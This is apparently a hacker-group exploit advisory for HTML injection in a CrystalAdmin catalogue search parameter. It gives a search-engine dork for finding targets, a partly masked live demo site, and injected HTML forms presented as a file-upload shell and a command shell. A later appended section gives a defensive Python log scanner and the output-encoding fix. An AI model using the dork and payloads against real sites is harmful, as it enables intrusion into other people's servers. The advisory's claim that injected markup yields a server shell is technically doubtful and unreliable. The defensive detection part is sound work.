#################################################################
=> Title: CrystalAdmin Html Injection Vulnerability
=> Author: silent
=> Credit: Rainarmy Security Team
=> Email: hacker.silent23@yahoo.com
##################################################################
=> Dork: inurl:/catalogue/products.asp?s=
=> Sample: http://www.target.com/catalogue/products.asp?s=[Html code]
=> Demo: http://www.aiXXXe.co.uk/catalogue/products.asp?s=[html code]
=> Html code: such as => <marquee>html injection</marquee>
###################################################################
=> To get a shell through the HTML injection, inject the shell
as HTML code such as this:
<form action="?dir=." method="POST" enctype="multipart/form-data">
<tr>
<td>Upload file:<input name="uploadfile" value="" type="file" class="input" size="30" >
<input name="doupfile" value="up" type="submit" class="input" size="30" >
<input name="uploaddir" value="." type="hidden" class="input" size="30" >
</td>
</tr>
</form>
or a cmd shell like this:
<form action="" method="POST" >
<tr>
<td>cmd:<select class="input" name="execfunc" >
<option value="system">system</option><option value="passthru">passthru</option>
<option value="exec">exec</option><option value="shell_exec">shell_exec</option>
<option value="popen">popen</option></select>
<input name="command" value="" type="text" class="input" size="30" >
<input name="Run" value="command" type="submit" class="input" size="30" >
</td>
</tr>
</form>
Also, this trick works when safe mode is off.
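
For defenders reviewing web server logs, the following added example (not part of the original advisory) flags requests to /catalogue/products.asp whose s parameter decodes to HTML markup, including double-encoded values. The IIS W3C field order, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

TARGET_STEM = "/catalogue/products.asp"   # path named in the advisory
TARGET_PARAM = "s"                        # parameter named in the advisory
# "<" directly followed by a letter (or "/") is what a browser parses as a tag.
TAG_RE = re.compile(r"</?[a-zA-Z]")

def fully_decode(value, max_rounds=3):
    """Undo repeated URL encoding (%253C -> %3C -> <), bounded in rounds."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_injection_attempts(log_lines):
    """Return (line_number, decoded_value) for requests carrying markup in 's'."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        if line.startswith("#"):          # W3C directive lines such as #Fields
            continue
        fields = line.split()
        if len(fields) < 6:               # assumed layout, see SAMPLE_LOG header
            continue
        stem, query = fields[3], fields[4]
        if stem.lower() != TARGET_STEM:
            continue
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower() == TARGET_PARAM:
                decoded = fully_decode(value)
                if TAG_RE.search(decoded):
                    hits.append((number, decoded))
    return hits

# Constructed sample log lines (assumed IIS W3C field order).
SAMPLE_LOG = [
    "#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status",
    "2024-05-01 10:00:01 GET /catalogue/products.asp s=garden+chairs 200",
    "2024-05-01 10:00:07 GET /catalogue/products.asp s=%3Cmarquee%3Ehtml+injection%3C%2Fmarquee%3E 200",
    "2024-05-01 10:00:09 GET /catalogue/products.asp s=%253Cform+action%253D%2522%2522%253E 200",
    "2024-05-01 10:00:12 GET /catalogue/index.asp s=%3Cb%3E 200",
    "2024-05-01 10:00:15 GET /catalogue/products.asp s=size+%3C+10 200",
]

if __name__ == "__main__":
    for number, value in find_injection_attempts(SAMPLE_LOG):
        print(f"line {number}: markup in 's' parameter: {value!r}")
```

A hit in the logs shows that markup was submitted; the underlying fix is to HTML-encode the s value wherever the page writes it back into the response.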
###################################################################
Special thanks to administrator, Data War, Time outer
###################################################################
wwww.rainarmy.com & www.rainarmy.com/forums
###################################################################